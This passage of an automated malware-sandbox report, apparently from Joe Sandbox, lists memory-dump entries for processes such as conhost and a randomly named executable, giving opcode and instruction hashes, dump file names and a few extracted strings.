                                • Opcode Fuzzy Hash: 788b18ddfbad803b65fbd3d6ce7d1aec744b3b9622c7d5703f5c56da80ea7097
                                • Instruction Fuzzy Hash: 8BE0E531E0D0068EF760BAD8D0003BD22A5AF84388F550079D92DE72C6CF7AAC418648
                                Memory Dump Source
                                • Source File: 00000005.00000002.2297318802.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_7ff848e90000_ContainerAgentWinSession.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: c9a7ebac4dbcc1b492641d0918653c0b04b6c1be29c3e3837045c21b23b8b416
                                • Instruction ID: 9d040bbed256630ae8fd7967054e32ca68bd4389d4f1de29088fcbb7a2c8e419
                                • Opcode Fuzzy Hash: c9a7ebac4dbcc1b492641d0918653c0b04b6c1be29c3e3837045c21b23b8b416
                                • Instruction Fuzzy Hash: D4D0A73161D54A8FE745B778D8498547B90FB1F314BC920E1D00CC7261D65448558701
                                Memory Dump Source
                                • Source File: 00000005.00000002.2297318802.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_7ff848e90000_ContainerAgentWinSession.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: bb4893728b1aa9b66dc85ee20b2448813799ca290fc308348fd43f964418cae0
                                • Instruction ID: e65d8228638dd825b5de3031fc224d67e4a94078b2cdfd46187ec1436de23706
                                • Opcode Fuzzy Hash: bb4893728b1aa9b66dc85ee20b2448813799ca290fc308348fd43f964418cae0
                                • Instruction Fuzzy Hash: A4E01234A0C20ADFE700FB94C4846AD7761FB51355F504265D41187289DBB86684C684
                                Memory Dump Source
                                • Source File: 00000005.00000002.2297318802.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_7ff848e90000_ContainerAgentWinSession.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e38b839a962afbf7466bb809ed74affd0fe7e6cfbd99036e6d55b82f99f34630
                                • Instruction ID: 7dfd813d5a94c95751d53650d402260dc67e6a49cb757f27893adb77e58464f3
                                • Opcode Fuzzy Hash: e38b839a962afbf7466bb809ed74affd0fe7e6cfbd99036e6d55b82f99f34630
                                • Instruction Fuzzy Hash: 68C04C06D5E52F09F455B1EE54460ECA1407FD96D8FD50172D51C404C29FED20D5415E
                                Memory Dump Source
                                • Source File: 00000005.00000002.2297318802.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_7ff848e90000_ContainerAgentWinSession.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b2b767db43ab861b6472bc43987cfc9b405dc4539c5e1ec182c4e5c5dd8ab7c4
                                • Instruction ID: 821f2b7c0af6af7d6f62a01d7a39af9af20f104bd01caa2ba1cfd0084e036ee5
                                • Opcode Fuzzy Hash: b2b767db43ab861b6472bc43987cfc9b405dc4539c5e1ec182c4e5c5dd8ab7c4
                                • Instruction Fuzzy Hash: B0C04C305158198FC954F76DC98595476A0FB0E215BD501D0E40DC7171E66ADC95C745
                                Memory Dump Source
                                • Source File: 00000005.00000002.2297318802.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_7ff848e90000_ContainerAgentWinSession.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b90639295109e6aec39a991a48599ecd0efb0a15be45a56fce924d123acdad66
                                • Instruction ID: b85895e8883aa790b9a0407e17e5c415c608bc80569033a9909c8476f139b02a
                                • Opcode Fuzzy Hash: b90639295109e6aec39a991a48599ecd0efb0a15be45a56fce924d123acdad66
                                • Instruction Fuzzy Hash: 55C08C304108088FC908FB28C88480433A0FF09204BC60090E009C7170E269DCC1C740
                                Memory Dump Source
                                • Source File: 00000005.00000002.2297318802.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_7ff848e90000_ContainerAgentWinSession.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e0e2223641c63c54a793a3730d39bf049b9d17eec812ed412aeac93c27a83171
                                • Instruction ID: 74c98ce29f0ac58c8866e7cb1458e737d09af23adde573d3f506a68a7b446102
                                • Opcode Fuzzy Hash: e0e2223641c63c54a793a3730d39bf049b9d17eec812ed412aeac93c27a83171
                                • Instruction Fuzzy Hash: A7C08C06E0DC2E9AE2552214042027E0002DF807A9F485071E00E872CACE2C190106CA
                                Memory Dump Source
                                • Source File: 00000005.00000002.2297318802.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_7ff848e90000_ContainerAgentWinSession.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 53bb17afe161cd3c8899fff8457088f758022530ecbe74bccee355b060b98651
                                • Instruction ID: 381b4269f8b35b75fbeebd4794d7e36e47f11862b5f9ffc51a323fd9870811af
                                • Opcode Fuzzy Hash: 53bb17afe161cd3c8899fff8457088f758022530ecbe74bccee355b060b98651
                                • Instruction Fuzzy Hash: 04B01201C6E40F04E41431FA08420E870407BC8188FC10070D80C4008199DD1094024A
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a8221350571243b20b4e9697f55943530a9d939b8a19f69a9e69d0ae770dfad8
                                • Instruction ID: 18ea9d70cdd63149e9f361345f8a36b7f17371ca0cd84ded221ede88125e5fc5
                                • Opcode Fuzzy Hash: a8221350571243b20b4e9697f55943530a9d939b8a19f69a9e69d0ae770dfad8
                                • Instruction Fuzzy Hash: B6116131E188099FEB94FB7C9059A6863D1FF68394F4400B5D40EC72A7DE68DC868B44
                                Memory Dump Source
                                • Source File: 00000019.00000002.2533647454.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_25_2_7ff848e90000_conhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: decf81c4f982908bcc34f923b849cc09361c72faca74904887ed8a0f23aaf13d
                                • Instruction ID: 26f42adde0ec78df75b34a737ac428a8f5318236501f5cf9abfc03128a487b2b
                                • Opcode Fuzzy Hash: decf81c4f982908bcc34f923b849cc09361c72faca74904887ed8a0f23aaf13d
                                • Instruction Fuzzy Hash: 3E11C231A0D7899FE702FBB888551AC7BB0FF42394F5544F7C044DB2A2D6781649CB95
                                Memory Dump Source
                                • Source File: 00000019.00000002.2533647454.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_25_2_7ff848e90000_conhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 4d2618250addc08769adf86ee29ab295a5e2dc34272934cd9fc2a2b0e315111c
                                • Instruction ID: 37ee0b4aec60d2667a370f72349aef8808cfdad5a951eea69653529b7930b41e
                                • Opcode Fuzzy Hash: 4d2618250addc08769adf86ee29ab295a5e2dc34272934cd9fc2a2b0e315111c
                                • Instruction Fuzzy Hash: BF11AD31A0D7899FE706FBB888550AC7FB0FF42394F5541F6C044DB2A2D6782A49CB95
                                Memory Dump Source
                                • Source File: 00000019.00000002.2533647454.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_25_2_7ff848e90000_conhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 09ddbb158f2b8f4bc2322e2d7f9fd1fc0969d01b76312e455351d8522a9537c7
                                • Instruction ID: a815f573088b94aee8fb7e34eba6de2f4270d9db5fa6abb580fa19fa32bb54a6
                                • Opcode Fuzzy Hash: 09ddbb158f2b8f4bc2322e2d7f9fd1fc0969d01b76312e455351d8522a9537c7
                                • Instruction Fuzzy Hash: 2A019E3190D7899FE706FBB8C84409CBFB0FF42344F5541E6C044DB2A2D6786A48CB81
                                Memory Dump Source
                                • Source File: 00000019.00000002.2533647454.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_25_2_7ff848e90000_conhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: ef398adeb80fbd3785f66ec4de651f706265fc963689c4077fc2c0da828842a3
                                • Instruction ID: 07c0158dbfeedd7d846d936881780579ff7598f1786c0300fe9fa27aca73a833
                                • Opcode Fuzzy Hash: ef398adeb80fbd3785f66ec4de651f706265fc963689c4077fc2c0da828842a3
                                • Instruction Fuzzy Hash: 8C018F30D0D789AFE706FBB488540ACBFB0FF02348F5441E6C044DB296DA785A44CB45
                                Memory Dump Source
                                • Source File: 00000019.00000002.2533647454.00007FF848EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EA0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_25_2_7ff848ea0000_conhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 819fd19c7363a49321a40d2d05c5a705dff6f03392342c6d540fa7b98fa4eb34
                                • Instruction ID: c6bd2fc56fd5847e7ba348db04c0ebe285c0c75d476cb67d150a26e25d570bb2
                                • Opcode Fuzzy Hash: 819fd19c7363a49321a40d2d05c5a705dff6f03392342c6d540fa7b98fa4eb34
                                • Instruction Fuzzy Hash: B4F05E34E0D64B8FEB58EB98C4505FEB7B1FF44751F00463AD41AD6689DF3469408B94
                                Memory Dump Source
                                • Source File: 00000019.00000002.2533647454.00007FF848EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EA0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_25_2_7ff848ea0000_conhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 5aab9105ceac1501b9ed8e79bf0673273df8f8b28c40e5d33f0700872f877a4c
                                • Instruction ID: 593afccc5975e9f7105026adf173e4d5143f4f01ade5126373c470672fc3093f
                                • Opcode Fuzzy Hash: 5aab9105ceac1501b9ed8e79bf0673273df8f8b28c40e5d33f0700872f877a4c
                                • Instruction Fuzzy Hash: 00D05E30B60A094B8B4CB62D8458434B3D2F7AA2067D45278940BC2281ED25ECC68B84
                                Memory Dump Source
                                • Source File: 00000019.00000002.2533647454.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_25_2_7ff848e90000_conhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 788b18ddfbad803b65fbd3d6ce7d1aec744b3b9622c7d5703f5c56da80ea7097
                                • Instruction ID: 4874c647f61bfd1c0424b24d179a3e7ae5a382ffad72da176d1e385fb71cf967
                                • Opcode Fuzzy Hash: 788b18ddfbad803b65fbd3d6ce7d1aec744b3b9622c7d5703f5c56da80ea7097
                                • Instruction Fuzzy Hash: 8BE0E531E0D0068EF760BAD8D0003BD22A5AF84388F550079D92DE72C6CF7AAC418648
                                Memory Dump Source
                                • Source File: 00000019.00000002.2533647454.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_25_2_7ff848e90000_conhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: c9a7ebac4dbcc1b492641d0918653c0b04b6c1be29c3e3837045c21b23b8b416
                                • Instruction ID: 9d040bbed256630ae8fd7967054e32ca68bd4389d4f1de29088fcbb7a2c8e419
                                • Opcode Fuzzy Hash: c9a7ebac4dbcc1b492641d0918653c0b04b6c1be29c3e3837045c21b23b8b416
                                • Instruction Fuzzy Hash: D4D0A73161D54A8FE745B778D8498547B90FB1F314BC920E1D00CC7261D65448558701
                                Memory Dump Source
                                • Source File: 00000019.00000002.2533647454.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_25_2_7ff848e90000_conhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: bb4893728b1aa9b66dc85ee20b2448813799ca290fc308348fd43f964418cae0
                                • Instruction ID: e65d8228638dd825b5de3031fc224d67e4a94078b2cdfd46187ec1436de23706
                                • Opcode Fuzzy Hash: bb4893728b1aa9b66dc85ee20b2448813799ca290fc308348fd43f964418cae0
                                • Instruction Fuzzy Hash: A4E01234A0C20ADFE700FB94C4846AD7761FB51355F504265D41187289DBB86684C684
                                Memory Dump Source
                                • Source File: 00000019.00000002.2533647454.00007FF848EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EA0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_25_2_7ff848ea0000_conhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: c0c7d8910fa8edb013cf39d84e77962b63d23f5184028abda98529c5d3d5d0f8
                                • Instruction ID: 3d90096790b864152a8fa73a9ee40d690075b896381298a92a5de2785ea278bc
                                • Opcode Fuzzy Hash: c0c7d8910fa8edb013cf39d84e77962b63d23f5184028abda98529c5d3d5d0f8
                                • Instruction Fuzzy Hash: 97D0C930D0C656CFEA49BA489841ABA33A1FF45789F014475EE4E83187CF78A8528A59
                                Memory Dump Source
                                • Source File: 00000019.00000002.2533647454.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_25_2_7ff848e90000_conhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e38b839a962afbf7466bb809ed74affd0fe7e6cfbd99036e6d55b82f99f34630
                                • Instruction ID: 7dfd813d5a94c95751d53650d402260dc67e6a49cb757f27893adb77e58464f3
                                • Opcode Fuzzy Hash: e38b839a962afbf7466bb809ed74affd0fe7e6cfbd99036e6d55b82f99f34630
                                • Instruction Fuzzy Hash: 68C04C06D5E52F09F455B1EE54460ECA1407FD96D8FD50172D51C404C29FED20D5415E
                                Memory Dump Source
                                • Source File: 00000019.00000002.2533647454.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_25_2_7ff848e90000_conhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b2b767db43ab861b6472bc43987cfc9b405dc4539c5e1ec182c4e5c5dd8ab7c4
                                • Instruction ID: 821f2b7c0af6af7d6f62a01d7a39af9af20f104bd01caa2ba1cfd0084e036ee5
                                • Opcode Fuzzy Hash: b2b767db43ab861b6472bc43987cfc9b405dc4539c5e1ec182c4e5c5dd8ab7c4
                                • Instruction Fuzzy Hash: B0C04C305158198FC954F76DC98595476A0FB0E215BD501D0E40DC7171E66ADC95C745
                                Memory Dump Source
                                • Source File: 00000019.00000002.2533647454.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_25_2_7ff848e90000_conhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b90639295109e6aec39a991a48599ecd0efb0a15be45a56fce924d123acdad66
                                • Instruction ID: b85895e8883aa790b9a0407e17e5c415c608bc80569033a9909c8476f139b02a
                                • Opcode Fuzzy Hash: b90639295109e6aec39a991a48599ecd0efb0a15be45a56fce924d123acdad66
                                • Instruction Fuzzy Hash: 55C08C304108088FC908FB28C88480433A0FF09204BC60090E009C7170E269DCC1C740
                                Memory Dump Source
                                • Source File: 00000019.00000002.2533647454.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_25_2_7ff848e90000_conhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: ab4d44619bca8bb13d48392295d185b6f17847caacda3f33adffe285e4bc6ecb
                                • Instruction ID: c6008dc64bb912bab3cf08655a31729d5835d4840ac7a539880ccb894a26876d
                                • Opcode Fuzzy Hash: ab4d44619bca8bb13d48392295d185b6f17847caacda3f33adffe285e4bc6ecb
                                • Instruction Fuzzy Hash: C3C08C06F0DC2A9AE2952254142027E0046DF80B8CF485071E00E872CADE1C190106CA
                                Memory Dump Source
                                • Source File: 00000019.00000002.2533647454.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_25_2_7ff848e90000_conhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 53bb17afe161cd3c8899fff8457088f758022530ecbe74bccee355b060b98651
                                • Instruction ID: 381b4269f8b35b75fbeebd4794d7e36e47f11862b5f9ffc51a323fd9870811af
                                • Opcode Fuzzy Hash: 53bb17afe161cd3c8899fff8457088f758022530ecbe74bccee355b060b98651
                                • Instruction Fuzzy Hash: 04B01201C6E40F04E41431FA08420E870407BC8188FC10070D80C4008199DD1094024A
                                Strings
                                Memory Dump Source
                                • Source File: 0000001B.00000002.2538084795.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_27_2_7ff848e90000_conhost.jbxd
                                Similarity
                                • API ID:
                                • String ID: 5X_H
                                • API String ID: 0-3241812158
                                • Opcode ID: 2770e21825e3bf326abcad56b103fce2cfcbdb578424206681ed3a3a1683835a
                                • Instruction ID: dd8e43f1a6f65da2ba6e4c9fa572d7b683f044e733d0a9b0ed2c14999f69d882
                                • Opcode Fuzzy Hash: 2770e21825e3bf326abcad56b103fce2cfcbdb578424206681ed3a3a1683835a
                                • Instruction Fuzzy Hash: B8913F71D1CA898FE789EB6888697B87FE0FB9A354F4400BAC009D73D2DBB91815C701
                                • API String ID:
                                • Opcode ID: ef398adeb80fbd3785f66ec4de651f706265fc963689c4077fc2c0da828842a3
                                • Instruction ID: 07c0158dbfeedd7d846d936881780579ff7598f1786c0300fe9fa27aca73a833
                                • Opcode Fuzzy Hash: ef398adeb80fbd3785f66ec4de651f706265fc963689c4077fc2c0da828842a3
                                • Instruction Fuzzy Hash: 8C018F30D0D789AFE706FBB488540ACBFB0FF02348F5441E6C044DB296DA785A44CB45
                                Memory Dump Source
                                • Source File: 0000001B.00000002.2538084795.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_27_2_7ff848e90000_conhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: cb65897aef3bebfaa9c3501a957d9e020c54da186a0abb5acc78b9748c16a7cf
                                • Instruction ID: f8432b74ead5a7877dfd752adb44d66d366229f281a06000a9111252e54894ab
                                • Opcode Fuzzy Hash: cb65897aef3bebfaa9c3501a957d9e020c54da186a0abb5acc78b9748c16a7cf
                                • Instruction Fuzzy Hash: 53F0302191C409CEEBA4FA98D4856F833A1FF54385F5001BAD84DD32A2DEB86E55864D
                                Memory Dump Source
                                • Source File: 0000001B.00000002.2538084795.00007FF848EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EA0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_27_2_7ff848ea0000_conhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 472152e0c8be7a53c176e9b48f36c28365f3434af9b0f1ab1e774e6955e1ac18
                                • Instruction ID: f1adefaf6aa0556078b924b1ab8f3830be293ad204ff62fd240e1785d2cab6e7
                                • Opcode Fuzzy Hash: 472152e0c8be7a53c176e9b48f36c28365f3434af9b0f1ab1e774e6955e1ac18
                                • Instruction Fuzzy Hash: 45F03A34E0960B8FEB58EB98C4505FEB7B1FF44751F00463AD41AD6689DF7469408A94
                                Memory Dump Source
                                • Source File: 0000001B.00000002.2538084795.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_27_2_7ff848e90000_conhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 788b18ddfbad803b65fbd3d6ce7d1aec744b3b9622c7d5703f5c56da80ea7097
                                • Instruction ID: 4874c647f61bfd1c0424b24d179a3e7ae5a382ffad72da176d1e385fb71cf967
                                • Opcode Fuzzy Hash: 788b18ddfbad803b65fbd3d6ce7d1aec744b3b9622c7d5703f5c56da80ea7097
                                • Instruction Fuzzy Hash: 8BE0E531E0D0068EF760BAD8D0003BD22A5AF84388F550079D92DE72C6CF7AAC418648
                                Memory Dump Source
                                • Source File: 0000001B.00000002.2538084795.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_27_2_7ff848e90000_conhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 6c56228407230d6c202e65f249f4463cb1669881550548cb6ff8199dd53ba4d0
                                • Instruction ID: 21ab46c16fe935fe7c15a2c90f176bb495fb89a0ab9f77a9ed343c6db9de258b
                                • Opcode Fuzzy Hash: 6c56228407230d6c202e65f249f4463cb1669881550548cb6ff8199dd53ba4d0
                                • Instruction Fuzzy Hash: B5D0A73195E98B8FE785B778DC95894BFA0FF1F314B8910D6D04CC72A2E6954898C701
                                Memory Dump Source
                                • Source File: 0000001B.00000002.2538084795.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_27_2_7ff848e90000_conhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: bb4893728b1aa9b66dc85ee20b2448813799ca290fc308348fd43f964418cae0
                                • Instruction ID: e65d8228638dd825b5de3031fc224d67e4a94078b2cdfd46187ec1436de23706
                                • Opcode Fuzzy Hash: bb4893728b1aa9b66dc85ee20b2448813799ca290fc308348fd43f964418cae0
                                • Instruction Fuzzy Hash: A4E01234A0C20ADFE700FB94C4846AD7761FB51355F504265D41187289DBB86684C684
                                Memory Dump Source
                                • Source File: 0000001B.00000002.2538084795.00007FF848EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EA0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_27_2_7ff848ea0000_conhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: c0c7d8910fa8edb013cf39d84e77962b63d23f5184028abda98529c5d3d5d0f8
                                • Instruction ID: 3d90096790b864152a8fa73a9ee40d690075b896381298a92a5de2785ea278bc
                                • Opcode Fuzzy Hash: c0c7d8910fa8edb013cf39d84e77962b63d23f5184028abda98529c5d3d5d0f8
                                • Instruction Fuzzy Hash: 97D0C930D0C656CFEA49BA489841ABA33A1FF45789F014475EE4E83187CF78A8528A59
                                Memory Dump Source
                                • Source File: 0000001B.00000002.2538084795.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_27_2_7ff848e90000_conhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e38b839a962afbf7466bb809ed74affd0fe7e6cfbd99036e6d55b82f99f34630
                                • Instruction ID: 7dfd813d5a94c95751d53650d402260dc67e6a49cb757f27893adb77e58464f3
                                • Opcode Fuzzy Hash: e38b839a962afbf7466bb809ed74affd0fe7e6cfbd99036e6d55b82f99f34630
                                • Instruction Fuzzy Hash: 68C04C06D5E52F09F455B1EE54460ECA1407FD96D8FD50172D51C404C29FED20D5415E
                                Memory Dump Source
                                • Source File: 0000001B.00000002.2538084795.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_27_2_7ff848e90000_conhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b90639295109e6aec39a991a48599ecd0efb0a15be45a56fce924d123acdad66
                                • Instruction ID: b85895e8883aa790b9a0407e17e5c415c608bc80569033a9909c8476f139b02a
                                • Opcode Fuzzy Hash: b90639295109e6aec39a991a48599ecd0efb0a15be45a56fce924d123acdad66
                                • Instruction Fuzzy Hash: 55C08C304108088FC908FB28C88480433A0FF09204BC60090E009C7170E269DCC1C740
                                Memory Dump Source
                                • Source File: 0000001B.00000002.2538084795.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_27_2_7ff848e90000_conhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: ab6a8a57b66caee6214c4605b584d11e3de0dd6065e30ffc3c108e0d5c201e3d
                                • Instruction ID: b2185df6519b135608103143095ac99249d3d2633138a1f16818b18697dfa6ba
                                • Opcode Fuzzy Hash: ab6a8a57b66caee6214c4605b584d11e3de0dd6065e30ffc3c108e0d5c201e3d
                                • Instruction Fuzzy Hash: A2C08C0AE0DC2A9AF3593214042027E0402DF80788F485071E00EC72CACE5C1A0106CA
                                Memory Dump Source
                                • Source File: 0000001B.00000002.2538084795.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_27_2_7ff848e90000_conhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 53bb17afe161cd3c8899fff8457088f758022530ecbe74bccee355b060b98651
                                • Instruction ID: 381b4269f8b35b75fbeebd4794d7e36e47f11862b5f9ffc51a323fd9870811af
                                • Opcode Fuzzy Hash: 53bb17afe161cd3c8899fff8457088f758022530ecbe74bccee355b060b98651
                                • Instruction Fuzzy Hash: 04B01201C6E40F04E41431FA08420E870407BC8188FC10070D80C4008199DD1094024A
                                Strings
                                Memory Dump Source
                                • Source File: 0000001B.00000002.2538084795.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_27_2_7ff848e90000_conhost.jbxd
                                Similarity
                                • API ID:
                                • String ID: c9$!k9$"s9$#{9
                                • API String ID: 0-1692736845
                                • Opcode ID: 696e16831c8a0c83608f077f1dc9b33155f26f3f6961ca39a436cafc05629c30
                                • Instruction ID: 4993736fcc240f919cad4a1a215fb278bf0b637f79f1f0cf1f8c5c920ef11074
                                • Opcode Fuzzy Hash: 696e16831c8a0c83608f077f1dc9b33155f26f3f6961ca39a436cafc05629c30
                                • Instruction Fuzzy Hash: 66419ED2ACA9633DE10E36FDB4020F96B44EF813B9F4C9677E04C890938F59608586F9
                                Strings
                                Memory Dump Source
                                • Source File: 0000001D.00000002.3395758060.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_29_2_7ff848e60000_NjWYKcLujkVoPzemFBeg.jbxd
                                Similarity
                                • API ID:
                                • String ID: 5[_H
                                • API String ID: 0-3279724263
                                • Opcode ID: 857ed264585acb8acd3be7e85679f6d2b8ca80278d6e1119af6c960e93cfd912
                                • Instruction ID: 356480faad0e59c4d70b65913f4975261b746bc96668863c1ef013533f96379e
                                • Opcode Fuzzy Hash: 857ed264585acb8acd3be7e85679f6d2b8ca80278d6e1119af6c960e93cfd912
                                • Instruction Fuzzy Hash: C8911675D1CA9D8FE789EF2888653A87FE0FB96354F4401BAC009E72D2EB782415C711
                                Memory Dump Source
                                • Source File: 0000001D.00000002.3395758060.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_29_2_7ff848e70000_NjWYKcLujkVoPzemFBeg.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: aa25747f1488207cdc32a9a4e3cb8e52db905260935fdf716d4ab4155196139a
                                • Instruction ID: 497b3a07208e66b37692dd2837e71cfb5665d04c80f4cde3f49103aa1bb10b0f
